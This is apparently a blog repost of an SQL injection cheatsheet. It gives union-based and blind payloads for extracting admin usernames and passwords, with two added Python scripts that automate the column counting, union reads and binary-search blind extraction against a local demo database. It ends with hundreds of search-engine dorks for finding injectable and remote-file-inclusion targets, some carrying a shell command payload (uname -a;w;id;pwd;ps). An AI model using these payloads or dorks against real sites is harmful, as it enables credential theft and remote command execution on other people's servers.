H-CRIME
A compilation of research on computer crime
I have moved all the articles and set up a new domain here:
http://toiphammaytinh.com
I hope you will follow along there.
Regards!
Wednesday, August 22, 2012
###################################################
# [+]Title: [Full SQL Injections Cheatsheet]
###################################################
# [+] About :
###################################################
# Author : GlaDiaT0R | the_gl4di4t0r@hotmail.com
# Team : DarkGh0st Team ( DarkGh0st.Com )
# Greetz: Boomrang_Victim, Marwen_Neo
###################################################
# [+] Summary:
# [1]-Introducing The SQL Injection Vuln
# [2]-Exploiting Sql Injection Vuln
# [3]-Exploiting Blind SQL Injection Vuln
###################################################
[1] - Introducing The SQL Injection Vuln:
SQL injection (also called SQL insertion) happens when user input is pasted into a database query without being escaped or bound as a parameter. The attacker can then run queries of his own through the vulnerable parameter and read information back: the SQL version, the number and names of tables and columns, authentication data, and so on.
[2] - Exploiting Sql Injection Vuln :
Before exploiting anything we have to check for the vulnerability, so take this example URL:
http://www.website.com/articles.php?id=3
To test it we append a ' (single quote) to the parameter:
http://www.website.com/articles.php?id=3'
If the page answers with an error such as "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use ...", the quote reached the database and the parameter is injectable.
If no error is shown, the parameter may still be injectable without visible errors; that case is covered in section [3] (blind SQL injection).
Now we exploit the vulnerability and extract information about the database. Before anything else we need the number of columns the vulnerable query returns.
[-] Finding the number of columns:
To find the number of columns we use ORDER BY: ordering by a column position that does not exist raises an error, so we increase the number until it breaks.
http://www.website.com/articles.php?id=3 order by 1/*
No error, so we increase the number:
http://www.website.com/articles.php?id=3 order by 2/*
Still no error, so we continue:
http://www.website.com/articles.php?id=3 order by 3/*
No error either.
http://www.website.com/articles.php?id=3 order by 4/*
No error.
http://www.website.com/articles.php?id=3 order by 5/*
Here we get the error (Unknown column '5' in 'order clause').
So the vulnerable query returns 4 columns, because the error appears at 5.
Next we check whether UNION works.
now, we try to check that UNION function work or not
[-] Checking UNION function :
for using UNION function we select more informations from the database in one statment
so we try this
http://www.website.com/articles.php?id=3 union all select 1,2,3,4/* (in the end it's 4 because we have see the number of columns it's 4)
now, if we see some numbers in the page like 1 or 2 or 3 or 4 == the UNION function work
if it not work we try to change the /* to --
so we have this
http://www.website.com/articles.php?id=3 union all select 1,2,3,4--
after checking the UNION function and it works good we try to get SQL version
[-] Getting SQL Version :
After the UNION check we know which number is displayed in the page; say it is 3.
We replace that 3 with @@version or version():
http://www.website.com/articles.php?id=3 union all select 1,2,@@version,4/*
and the MySQL version is printed where the 3 used to be.
Now we move on to table and column names.
[-] Getting tables and columns names :
Here we have some work to do!
If the MySQL version is < 5 (e.g. 4.1.33, 4.1.12 ...) there is no information_schema database to list tables from, so table and column names have to be guessed (on 5.x and later they can be read from information_schema.tables and information_schema.columns instead).
Let's check whether a table named admin exists:
http://www.website.com/articles.php?id=3 union all select 1,2,3,4 from admin/*
If the number 3 still shows up in the page, the table admin exists (a missing table gives "Table 'x.admin' doesn't exist").
Now we check column names:
http://www.website.com/articles.php?id=3 union all select 1,2,username,4 from admin/*
If we get an error ("Unknown column 'username' in 'field list'"), we try another column name;
if it works, a username is displayed in the page (e.g. admin, moderator, super moderator ...).
Then we check whether a column password exists:
http://www.website.com/articles.php?id=3 union all select 1,2,password,4 from admin/*
and there it is: the password appears in the page, as a hash or in clear text.
To get both values at once we use concat() with 0x3a (the hex code of ':') as a separator, which prints username:password, e.g. admin:<hash>:
http://www.website.com/articles.php?id=3 union all select 1,2,concat(username,0x3a,password),4 from admin/*
That is plain (in-band) SQL injection. Now we go to blind SQL injection, which is harder.
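The checks of section [2] above, automated as an added example; this is not code from the original cheatsheet or its author. It builds a constructed, deliberately vulnerable stand-in for articles.php?id= (the value is glued into the SQL text, as the tutorial assumes) next to the hardened parameterised form, and probes both with the same steps: the quote test, the ORDER BY column count, and a UNION read of the version and of username:password. SQLite stands in for MySQL so the example runs offline; the table and column names (articles, admin, username, password) and the data are constructed, and the SQLite spellings (sqlite_version(), ||) are noted beside the MySQL ones used on the page.

```python
"""Added example (not part of the original cheatsheet): the checks from
section [2] automated against a constructed, deliberately vulnerable
stand-in for articles.php?id=.

SQLite replaces MySQL so this runs offline. The probing logic is the same;
only a few spellings differ and are noted inline (SQLite has no @@version
and concatenates with || instead of concat()).
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one article and one admin row (fake hash)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles(id INTEGER, title TEXT, body TEXT, author TEXT);
        INSERT INTO articles VALUES (3, 'Hello', 'First post', 'editor');
        CREATE TABLE admin(username TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin', 'deadbeef');
    """)
    return conn


def vulnerable_query(conn, article_id: str):
    """articles.php?id=... as the tutorial assumes: the value is glued into the SQL text."""
    sql = f"SELECT id, title, body, author FROM articles WHERE id={article_id}"
    return conn.execute(sql).fetchall()


def safe_query(conn, article_id: str):
    """Hardened form: the value is bound as a parameter, so it can never become SQL."""
    sql = "SELECT id, title, body, author FROM articles WHERE id=?"
    return conn.execute(sql, (article_id,)).fetchall()


def looks_injectable(probe) -> bool:
    """Step 1 of the tutorial: does a stray quote reach the SQL parser?"""
    try:
        probe("3'")
    except sqlite3.OperationalError:  # MySQL: "You have an error in your SQL syntax ..."
        return True
    return False


def count_columns(probe, limit: int = 20):
    """ORDER BY n for n = 1, 2, ...; the first n that errors means the query has n-1 columns.

    Returns None if no ORDER BY position up to `limit` errors out, which is
    what a parameterised endpoint looks like from the outside."""
    for n in range(1, limit + 1):
        try:
            probe(f"3 ORDER BY {n}")  # page: ...?id=3 order by n/*
        except sqlite3.OperationalError:  # MySQL: "Unknown column 'n' in 'order clause'"
            return n - 1
    return None


def union_read(probe, ncols: int, visible_col: int, expr: str, table: str = None):
    """UNION ALL SELECT with `expr` placed in the column the page displays.

    id=0 suppresses the original row, so only our row comes back."""
    cols = ["NULL"] * ncols
    cols[visible_col - 1] = expr
    payload = f"0 UNION ALL SELECT {','.join(cols)}"
    if table:
        payload += f" FROM {table}"
    return [row[visible_col - 1] for row in probe(payload)]


if __name__ == "__main__":
    conn = make_db()
    vuln = lambda value: vulnerable_query(conn, value)
    safe = lambda value: safe_query(conn, value)
    print("vulnerable endpoint injectable:", looks_injectable(vuln))
    print("hardened endpoint injectable:  ", looks_injectable(safe))
    n = count_columns(vuln)
    print("columns:", n)
    print("version:", union_read(vuln, n, 3, "sqlite_version()"))  # MySQL: @@version
    # MySQL: concat(username,0x3a,password)
    print("creds:  ", union_read(vuln, n, 3, "username || ':' || password", "admin"))
```

Against the parameterised endpoint every probe simply returns no rows: the quote raises no error and no ORDER BY position ever fails, which is exactly the "nothing happens" outcome the tutorial describes, and the reason the fix is binding values rather than filtering characters.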
[3] - Exploiting Blind SQL Injection Vuln :
First we check whether the site is vulnerable. Take
http://www.website.com/articles.php?id=3
and test it with a condition that is always true:
http://www.website.com/articles.php?id=3 and 1=1 (no error, the page loads normally)
and then with one that is always false:
http://www.website.com/articles.php?id=3 and 1=2
If now some text, pictures or other content go missing, that is what we want: the page depends on the truth of our condition, so the site is vulnerable to blind SQL injection. Every question below is asked this way and answered by whether the page loads normally or not.
Next we check the MySQL version.
[-] Getting MySQL Version :
In blind injection we use substring to test the version one character at a time:
http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=4
If the page breaks, we replace the 4 with 5 and try again; the value that loads the page normally is the major version:
http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=5
Before reading data we need subselects, so we test that they work.
[-] Testing if subselect works :
http://www.website.com/articles.php?id=3 and (select 1)=1 (if the page loads normally, subselects work)
Now we check whether we have access to mysql.user:
http://www.website.com/articles.php?id=3 and (select 1 from mysql.user limit 0,1)=1 (if it loads normally we can read mysql.user)
Now we can check table and column names.
now, we can checking table and column names
[-] Checking table and column names :
http://www.website.com/articles.php?id=3 and (select 1 from users limit 0,1)=1
if the page load normaly and no errors the table users exists
now we need column name
http://www.website.com/articles.php?id=3 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page load normaly and no errors the column password exists
now we have the table and the column , yeah, we can exploiting the vunlnerability now
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
The page loads normally, so the first character is above 80; we raise the number until the page breaks:
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>90
No error, so we continue:
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
Now the page breaks, so the character is at most 99; one more query pins it down:
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
The page loads normally, so the character is exactly char(99). An ASCII table tells us that char(99) is the letter 'c'.
To test the second character we change ,1,1 to ,2,1:
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
The page loads normally.
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104
The page loads normally, so we go higher:
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107
The page breaks, so we go lower:
http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105
The page breaks again: that is the answer we were looking for, because >104 loads and >105 breaks.
So the second character is char(105), which is 'i'. From the first two characters we have 'ci'; the remaining characters are found the same way by increasing the position (,3,1 then ,4,1 and so on), and a position past the end of the string returns an empty string whose ascii() is 0.
Our tutorial draws to a close!
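The blind extraction of section [3], automated as an added example; this is not code from the original cheatsheet or its author. It builds a constructed stand-in for articles.php?id=3 and <condition>, where the page "loads normally" when the article row still comes back and "breaks" when the condition is false or the injected SQL errors, and runs the tutorial's checks against it (1=1 / 1=2, version digit, subselect, table and column existence). It then goes beyond the page: instead of narrowing each character by hand (>80, >90, >99 ...) it does a proper binary search over the ASCII range and detects the end of the string. SQLite stands in for MySQL so it runs offline; unicode()/substr() play the role of ascii()/substring(), and the table, column names and data (users, username, password, cindy:deadbeef) are constructed.

```python
"""Added example (not part of the original cheatsheet): the boolean blind
extraction of section [3], automated.

Constructed stand-in for articles.php?id=3 and <condition>: the page
"loads normally" when the article row still comes back and "breaks" when
the condition is false or the injected SQL errors. SQLite replaces MySQL so
this runs offline; unicode()/substr() stand in for ascii()/substring().
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data; the credential string is what we recover blind."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles(id INTEGER, title TEXT);
        INSERT INTO articles VALUES (3, 'Hello');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('cindy', 'deadbeef');
    """)
    return conn


def page_loads_normally(conn, condition: str) -> bool:
    """The only signal a blind injection gives: did the article render or not?"""
    sql = f"SELECT title FROM articles WHERE id=3 AND {condition}"
    try:
        return len(conn.execute(sql).fetchall()) == 1
    except sqlite3.OperationalError:  # a broken query (unknown table, ...) breaks the page too
        return False


def extract_string(oracle, subquery: str, max_len: int = 64) -> str:
    """Recover the scalar result of `subquery` one character at a time.

    The tutorial narrows each character by hand (>80, >90, >99 ...). This does a
    binary search over the 7-bit range, so every character costs 7 requests
    instead of up to 127, plus one request per position to detect the end of
    the string (which the page does by ascii('') = 0)."""
    out = []
    for pos in range(1, max_len + 1):
        # MySQL: length((select ...)) >= pos
        if not oracle(f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 1, 127  # the value lies in [lo, hi] throughout the loop
        while lo < hi:
            mid = (lo + hi + 1) // 2
            # page: ascii(substring((select ...),pos,1)) > N ; >= keeps the search exact
            if oracle(f"unicode(substr(({subquery}),{pos},1)) >= {mid}"):
                lo = mid
            else:
                hi = mid - 1
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    conn = make_db()
    ask = lambda cond: page_loads_normally(conn, cond)
    print("1=1 loads:", ask("1=1"), " 1=2 loads:", ask("1=2"))
    print("major version 3:", ask("substr(sqlite_version(),1,1)='3'"))  # MySQL: substring(@@version,1,1)=5
    print("subselect works:", ask("(SELECT 1)=1"))
    print("table users exists:", ask("(SELECT 1 FROM users LIMIT 1)=1"))
    print("table nosuch exists:", ask("(SELECT 1 FROM nosuch LIMIT 1)=1"))
    # MySQL: (select substring(concat(1,password),1,1) from users limit 0,1)=1
    print("column password exists:", ask("(SELECT substr(1 || password,1,1) FROM users LIMIT 1)='1'"))
    print("recovered:", extract_string(ask, "SELECT username || ':' || password FROM users LIMIT 1"))
```

The oracle deliberately maps an SQL error to "page breaks" rather than raising, because that is all a blind target shows: a guessed table that does not exist and a condition that is false look identical from the outside, which is why the tutorial checks table and column existence with the same yes/no questions it later uses to read data.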
Thank you for reading, and I hope you have understood SQL injection and how this vulnerability is exploited.
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:ages.php?id=
inurl:material.php?id=
inurl:viewapp.php?id=
inurl:galeri_info.php?l=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/phpopenchat/contrib/yabbse/poc.php?sourcedir=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
(www.google.com => intitle:PHPOpenChat exthp)
/calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/datePicker.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
(www.google.com => intitle:"EasyPHPCalendar" exthp)
/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
/inc/header.php/step_one.php?server_inc=
/install/index.php?lng=../../include/main.inc&G_PATH=
/inc/pipe.php?HCL_path=
/include/write.php?dir=
/support/mailling/maillist/inc/initdb.php?absolute_path=
/coppercop/theme.php?THEME_DIR=
/yabbse/Sources/Packages.php?sourcedir=
/zboard/zboard.php
/path_of_cpcommerce/_functions.php?prefix
/dotproject/modules/projects/addedit.php?root_dir=
/dotproject/modules/projects/view.php?root_dir=
/dotproject/modules/projects/vw_files.php?root_dir=
/dotproject/modules/tasks/addedit.php?root_dir=
/dotproject/modules/tasks/viewgantt.php?root_dir=
/My_eGallery/public/displayCategory.php?basepath=
/index.php?meio.php=
/index.php?include= | /index.php?inc= | /index.php?page= | /index.php?pag= | /index.php?p=
/index.php?x= | /index.php?open= | /index.php?open= | /index.php?visualizar= | /index.php?pagina=
/index.php?content= | /index.php?cont= | /index.php?c= | /index.php?meio= | /index.php?x=
/index.php?cat= | /index.php?site= /index.php?configFile= | /index.php?action= | /index.php?do=
/index2.php?x= | /index2.php?content= | /template.php?pagina= | /inc/step_one_tables.php?server_inc=
/GradeMap/index.php?page= | /phpshop/index.php?base_dir= | /admin.php?cal_dir=
/path_of_cpcommerce/_functions.php?prefix= | /contacts.php?cal_dir= | /convert-date.php?cal_dir=
/album_portal.php?phpbb_root_path=
/mainfile.php?MAIN_PATH=
/dotproject/modules/files/index_table.php?root_dir=
/html/affich.php?base=
/gallery/init.php?HTTP_POST_VARS=
/pm/lib.inc.php?pm_path=
/ideabox/include.php?gorumDir=
index2.php?includes_dir=
forums/toplist.php?phpbb_root_path=
forum/toplist.php?phpbb_root_path=
admin/config_settings.tpl.php?include_path=
include/common.php?include_path=
event/index.php?page=
forum/index.php?includeFooter=
forums/index.php?includeFooter=
forum/bb_admin.php?includeFooter=
forums/bb_admin.php?includeFooter=
language/lang_english/lang_activity.php?phpbb_root_path=
forum/language/lang_english/lang_activity.php?phpbb_root_path=
blend_data/blend_common.php?phpbb_root_path=
master.php?root_path=
includes/kb_constants.php?module_root_path=
forum/includes/kb_constants.php?module_root_path=
forums/includes/kb_constants.php?module_root_path=
classes/adodbt/sql.php?classes_dir=
agenda.php3?rootagenda=
agenda2.php3?rootagenda=
sources/lostpw.php?CONFIG[path]=
topsites/sources/lostpw.php?CONFIG[path]=
toplist/sources/lostpw.php?CONFIG[path]=
sources/join.php?CONFIG[path]=
topsites/sources/join.php?CONFIG[path]=
toplist/sources/join.php?CONFIG[path]=
topsite/sources/join.php?CONFIG[path]=
public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=
extras/poll/poll.php?file_newsportal=
index.php?site_path=
mail/index.php?site_path=
fclick/show.php?path=
show.php?path=
calogic/reconfig.php?GLOBALS[CLPath]=
eshow.php?Config_rootdir=
auction/auction_common.php?phpbb_root_path=
index.php?inc_dir=
calendar/index.php?inc_dir=
modules/TotalCalendar/index.php?inc_dir=
modules/calendar/index.php?inc_dir=
calendar/embed/day.php?path=
ACalendar/embed/day.php?path=
calendar/add_event.php?inc_dir=
claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=
claroline/auth/ldap/authldap.php?includePath=
docebo/modules/credits/help.php?lang=
modules/credits/help.php?lang=
config.php?returnpath=
editsite.php?returnpath=
in.php?returnpath=
addsite.php?returnpath=
includes/pafiledb_constants.php?module_root_path=
phpBB/includes/pafiledb_constants.php?module_root_path=
pafiledb/includes/pafiledb_constants.php?module_root_path=
auth/auth.php?phpbb_root_path=
auth/auth_phpbb/phpbb_root_path=
apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=
apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=
infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=
phpdig/includes/config.php?relative_script_path=
includes/phpdig/includes/config.php?relative_script_path=
includes/dbal.php?eqdkp_root_path=
eqdkp/includes/dbal.php?eqdkp_root_path=
dkp/includes/dbal.php?eqdkp_root_path=
path/include/SQuery/gameSpy2.php?libpath=
include/global.php?GLOBALS[includeBit]=
topsites/config.php?returnpath=
manager/frontinc/prepend.php?_PX_config[manager_path]=
ubbthreads/addpost_newpoll.php?addpoll=thispath=
forum/addpost_newpoll.php?thispath=
forums/addpost_newpoll.php?thispath=
ubbthreads/ubbt.inc.php?thispath=
forums/ubbt.inc.php?thispath=
forum/ubbt.inc.php?thispath=
forum/admin/addentry.php?phpbb_root_path=
admin/addentry.php?phpbb_root_path=
index.php?f=
index.php?act=
ipchat.php?root_path=
includes/orderSuccess.inc.php?glob[rootDir]=
stats.php?dir[func]=dir[base]=
ladder/stats.php?dir[base]=
ladders/stats.php?dir[base]=
sphider/admin/configset.php?settings_dir=
admin/configset.php?settings_dir=
vwar/admin/admin.php?vwar_root=
modules/vwar/admin/admin.php?vwar_root=
modules/vWar_Account/includes/get_header.php?vwar_root=
modules/vWar_Account/includes/functions_common.php?vwar_root2=
impex/ImpExData.php?systempath=
forum/impex/ImpExData.php?systempath=
forums/impex/ImpExData.php?systempath=
application.php?base_path=
index.php?theme_path=
become_editor.php?theme_path=
add.php?theme_path=
bad_link.php?theme_path=
browse.php?theme_path=
detail.php?theme_path=
fav.php?theme_path=
get_rated.php?theme_path=
login.php?theme_path=
mailing_list.php?theme_path=
new.php?theme_path=
modify.php?theme_path=
pick.php?theme_path=
power_search.php?theme_path=
rating.php?theme_path=
register.php?theme_path=
review.php?theme_path=
rss.php?theme_path=
search.php?theme_path=
send_pwd.php?theme_path=
sendmail.php?theme_path=
tell_friend.php?theme_path=
top_rated.php?theme_path=
user_detail.php?theme_path=
user_search.php?theme_path=
invoice.php?base_path=
cgi-bin//classes/adodbt/sql.php?classes_dir=
cgi-bin/install/index.php?G_PATH=
cgi-bin/include/print_category.php?dir=
includes/class_template.php?quezza_root_path=
bazar/classified_right.php?language_dir=
classified_right.php?language_dir=
phpBazar/classified_right.php?language_dir=
chat/messagesL.php3?cmd=
phpMyChat/chat/messagesL.php3?cmd=
bbs/include/write.php?dir=
visitorupload.php?cmd=
modules/center/admin/accounts/process.php?module_path]=
index.php?template=
armygame.php?libpath=
lire.php?rub=
pathofhostadmin/?page=
apa_phpinclude.inc.php?apa_module_basedir=
index.php?req_path=
research/boards/encapsbb-0.3.2_fixed/index_header.php?root=
Farsi1/index.php?archive=
index.php?archive=
show_archives.php?template=
forum/include/common.php?pun_root=
pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=
vuln.php?=
cgi-bin//include/write.php?dir=
admin/common.inc.php?basepath=
pm/lib.inc.php?sfx=
pm/lib.inc.php?pm_path=
artmedic-kleinanzeigen-path/index.php?id=
index.php?pagina=
osticket/include/main.php?include_dir=
include/main.php?config[search_disp]=include_dir=
phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
quick_reply.php?phpbb_root_path=
zboard/include/write.php?dir=
PATH/admin/plog-admin-functions.php?configbasedir=
path_to_phpgreetz/content.php?content=
path_to_qnews/q-news.php?id=
_conf/core/common-tpl-vars.php?confdir=
votebox.php?VoteBoxPath=
al_initialize.php?alpath=
modules/news/archivednews.php?GLOBALS[language_home]=
protection.php?siteurl=
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
classes.php?LOCAL_PATH=
extensions/moblog/moblog_lib.php?basedir=
modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
phpWebLog/include/init.inc.php?G_PATH=
admin/objects.inc.php4?Server=
trg_news30/trgnews/install/article.php?dir=
block.php?Include=
arpuivo.php?data=
path_to_gallery/setup/index.php?GALLERY_BASEDIR=
include/help.php?base=
index.php?[Home]=
path_to_script/block.php?Include=
examples/phonebook.php?page=
PHPNews/auth.php?path=
include/print_category.php?dir=
skin/zero_vote/login.php?dir=
skin/zero_vote/setup.php?dir=
skin/zero_vote/ask_password.php?dir=
gui/include/sql.php?include_path=
webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=
email.php?login=cer_skin=
PhotoGal/ops/gals.php?news_file=
index.php?custom=
loginout.php?cutepath=
oneadmin/config.php?path[docroot]=
xcomic/initialize.php?xcomicRootPath=
skin/zero_vote/error.php?dir=
admin_modules/admin_module_captions.inc.php?config[path_src_include]=
admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=
admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=
admin_modules/admin_module_edit.inc.php?config[path_src_include]=
admin_modules/admin_module_delimage.inc.php?config[path_src_include]=
admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
src/index_overview.inc.php?config[path_src_include]=
src/index_leftnavbar.inc.php?config[path_src_include]=
src/index_image.inc.php?config[path_src_include]=
src/image-gd.class.php?config[path_src_include]=
src/image.class.php?config[path_src_include]=
src/album.class.php?config[path_src_include]=
src/show_random.inc.php?config[path_src_include]=
src/main.inc.php?config[path_src_include]=
src/index_passwd-admin.inc.php?config[path_admin_include]=
yappa-ng/src/index_overview.inc.php?config[path_src_include]=
src/image.class.php?config[image_module]=
includes/db_adodb.php?baseDir=
includes/db_connect.php?baseDir=
includes/session.php?baseDir=
modules/projects/gantt.php?dPconfig[root_dir]=
modules/projects/gantt2.php?dPconfig[root_dir]=
modules/projects/vw_files.php?dPconfig[root_dir]=
modules/admin/vw_usr_roles.php?baseDir=
modules/public/calendar.php?baseDir=
modules/public/date_format.php?baseDir=
modules/tasks/gantt.php?baseDir=
mantis/login_page.php?g_meta_include_file=
phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=
modules/My_eGallery/public/displayCategory.php?basepath=
dotproject/modules/files/index_table.php?root_dir=
nukebrowser.php?filnavn=
bug_sponsorship_list_view_inc.php?t_core_path=
modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
modules/coppermine/themes/maze/theme.php?THEME_DIR=
modules/coppermine/include/init.inc.php?CPG_M_DIR=
includes/calendar.php?phpc_root_path=
includes/setup.php?phpc_root_path=
phpBB/admin/admin_styles.php?mode=
aMember/plugins/db/mysql/mysql.inc.php?config=
admin/lang.php?CMS_ADMIN_PAGE=
inc/pipe.php?HCL_path=
include/write.php?dir=
becommunity/community/index.php?pageurl=
modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
modules/mod_mainmenu.php?mosConfig_absolute_path=
modules/agendax/addevent.inc.php?agendax_path=
shoutbox/expanded.php?conf=
modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
index.php?page=
index.php?pag=
index.php?include=
index.php?content=
index.php?cont=
index.php?c=
